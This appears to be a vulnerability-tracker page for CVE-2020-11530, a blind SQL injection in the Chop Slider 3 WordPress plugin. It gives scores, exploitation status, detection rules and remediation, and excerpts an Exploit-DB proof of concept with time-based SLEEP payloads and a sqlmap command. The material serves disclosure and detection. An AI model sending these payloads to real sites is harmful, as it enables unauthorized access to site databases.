CVE-2020-11530
published 2020-05-08CVE-2020-11530: A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin. The vulnerability is introduced in the id GET parameter supplied to…
PriorityP186critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
95.66%
99.9th percentile
A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin. The vulnerability is introduced in the id GET parameter supplied to get_script/index.php, and allows an attacker to execute arbitrary SQL queries in the context of the WP database user.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| idangero | chop_slider | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/wp-content/plugins/chopslider/get_script/index.php?id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))A)↗
commandGET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or (SELECT sleep(10))=6868↗
yara↗
rule CVE_2020_11530_ChopSlider_SQLi { strings: $path = "/wp-content/plugins/chopslider/get_script/index.php" $sleep = "SLEEP" condition: $path and $sleep }- →Detect time-based blind SQLi attempts against ChopSlider by monitoring GET requests to /wp-content/plugins/chopslider/get_script/index.php with SQL keywords (SLEEP, SELECT, OR, AND) in the 'id' parameter. ↗
- →Alert on HTTP responses with status 200, Content-Type application/javascript, and body containing '$(document).ready(function()' from the ChopSlider path — combined with a response duration >= 6 seconds — indicating successful time-based SQLi. ↗
- →Boolean-based blind SQLi payloads targeting ChopSlider use OR clauses such as 'id=-3097 OR 2236=2236'; monitor for non-numeric or SQL-expression values in the id GET parameter. ↗
- →Time-based blind SQLi payloads use OR SLEEP(N) in the id parameter (e.g., 'id=1111111111 OR SLEEP(5)'); monitor for SLEEP calls in query strings to this endpoint. ↗
- ·The injection payload must be URL-encoded when sent via GET, and magic_quotes is applied server-side — detection rules must account for both encoded and decoded forms of SQL metacharacters. ↗
- ·The Nuclei template uses a 10-second request timeout to accommodate the SLEEP(6) payload; detection infrastructure (WAF, IDS) must be tuned to not drop or timeout slow responses before the full duration is observed. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r26h-642q-j6cg: A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin
ghsa_unreviewed·2022-05-24
CVE-2020-11530 [HIGH] GHSA-r26h-642q-j6cg: A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin
A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin. The vulnerability is introduced in the id GET parameter supplied to get_script/index.php, and allows an attacker to execute arbitrary SQL queries in the context of the WP database user.
VulnCheck
idangero chop_slider Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-11530 [CRITICAL] idangero chop_slider Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
idangero chop_slider Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin. The vulnerability is introduced in the id GET parameter supplied to get_script/index.php, and allows an attacker to execute arbitrary SQL queries in the context of the WP database user.
Affected: idangero chop_slider
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-04-27&host_type=src&vulnerability=cve-2020-11530; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?
No detection rules found.
Exploit-DB
WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection
exploitdb·2020-05-12
CVE-2020-11530 WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection
WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection
---
# Exploit Title: ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection
# Exploit Author: SunCSR (Sun* Cyber Security Research)
# Google Dork: N/A
# Date: 2020-05 -12
# Vendor Homepage: https://idangero.us/
# Software Link: https://github.com/idangerous/Plugins
# Version: get_row('SELECT * FROM ' . CHOPSLIDER_TABLE_NAME . '
WHERE chopslider_id =' . $id);
PoC:
Blind SQL injection:
GET /wp-content/plugins/chopslider/get_script/index.php?id=1111111 or
(SELECT sleep(10))=6868
SQLMap using:
sqlmap -u '
http://localhost/wp-content/plugins/chopslider/get_script/index.php?id=1111111111'
--level=5 --risk=3
sqlmap identified the following injection point(s) with a total of 17611
HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based bl
Metasploit
WordPress ChopSlider3 id SQLi Scanner
metasploit
WordPress ChopSlider3 id SQLi Scanner
WordPress ChopSlider3 id SQLi Scanner
The iDangero.us Chop Slider 3 WordPress plugin version 3.4 and prior contains a blind SQL injection in the id parameter of the get_script/index.php page. The injection is passed through GET parameters, and thus must be encoded, and magic_quotes is applied at the server.
Nuclei
WordPress Chop Slider 3 - Blind SQL Injection
nuclei·CVSS 9.8
CVE-2020-11530 [CRITICAL] WordPress Chop Slider 3 - Blind SQL Injection
WordPress Chop Slider 3 - Blind SQL Injection
WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in the context of the WP database user, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
Template:
id: CVE-2020-11530
info:
name: WordPress Chop Slider 3 - Blind SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress Chop Slider 3 plugin contains a blind SQL injection vulnerability via the id GET parameter supplied to get_script/index.php. The plugin can allow an attacker to execute arbitrary SQL queries in
http://packetstormsecurity.com/files/157607/WordPress-ChopSlider-3-SQL-Injection.htmlhttp://packetstormsecurity.com/files/157655/WordPress-ChopSlider3-3.4-SQL-Injection.htmlhttp://seclists.org/fulldisclosure/2020/May/26https://github.com/idangerous/Plugins/tree/master/Chop%20Slider%203https://idangero.us/http://packetstormsecurity.com/files/157607/WordPress-ChopSlider-3-SQL-Injection.htmlhttp://packetstormsecurity.com/files/157655/WordPress-ChopSlider3-3.4-SQL-Injection.htmlhttp://seclists.org/fulldisclosure/2020/May/26https://github.com/idangerous/Plugins/tree/master/Chop%20Slider%203https://idangero.us/
2020-05-08
Published
Exploited in the wild